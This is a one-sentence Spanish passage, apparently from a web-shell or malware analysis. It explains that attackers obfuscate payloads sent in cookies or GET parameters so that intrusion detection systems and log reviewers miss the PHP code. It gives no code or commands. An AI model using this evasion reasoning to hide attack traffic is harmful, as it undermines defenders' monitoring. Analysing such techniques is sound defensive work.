La razón por la que se molestan en ofuscar la carga útil que están pasando en la cookie o en obtener el parámetro es para reducir las posibilidades de que sea detectado por un IDS que busca código PHP o que alguien lo detecte en los registros.